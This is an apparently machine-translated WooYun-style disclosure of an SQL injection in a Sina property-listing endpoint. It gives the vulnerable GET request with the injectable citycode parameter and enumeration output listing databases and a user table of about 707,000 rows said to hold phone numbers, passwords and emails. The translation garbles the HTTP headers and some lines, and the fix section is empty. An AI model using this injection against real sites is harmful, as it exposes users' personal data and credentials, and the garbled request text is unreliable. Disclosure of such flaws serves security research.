漏洞标题 新浪某处SQL注入(union跨库70万/手机号/密码/邮箱) 相关厂商 新浪 漏洞作者 null_z 提交时间 2016-04-24 17:12 公开时间 2016-06-09 12:10…
漏洞标题
新浪某处SQL注入(联合跨数据库700,000 /手机号码/密码/邮箱)
相关制造商
新浪
漏洞作者
Null_z
提交时间
2016-04-24 17: 12
公共时间
2016-06-09 12: 10
漏洞类型
SQL注入漏洞
危险等级
高
自我评估等级
12
漏洞状态
制造商已确认
标签标签
字符类型注入,Mysql
漏洞详细信息
注入参数citycode
GET /di/positioncommunity/?y=30.478509069093036&x=114.3076242453857&citycode=bj*&_=1461484523118&callback=jsonp5 HTTP/1.1
主持人: bj.esf.sina.com.cn
连接:保持活动状态
接受语言: zh-cn
Accept-Encoding: gzip,deflate
Referer:http://m.leju.com/touch/esf/bj?ln=ljmf_h5&source=ios&s=yd_kdlj
主持人: bj.esf.sina.com.cn
接受: */*
从对等方接收数据时失败
[*] mysql
[*] performance_schema
[*] shop_admin
[*]测试
后端DBMS: MySQL>=5.0.0
数据库: shop_admin
+ --------- + --------- +
|表|参赛作品|
+ --------- + --------- +
| sp_user | 707287 |
+ --------- + --------- +
修理计划:
~~
版权声明:请注明出处null_z @乌云
-
发表于 2016-07-17 08:00
- 阅读 ( 556 )
- 分类:黑客技术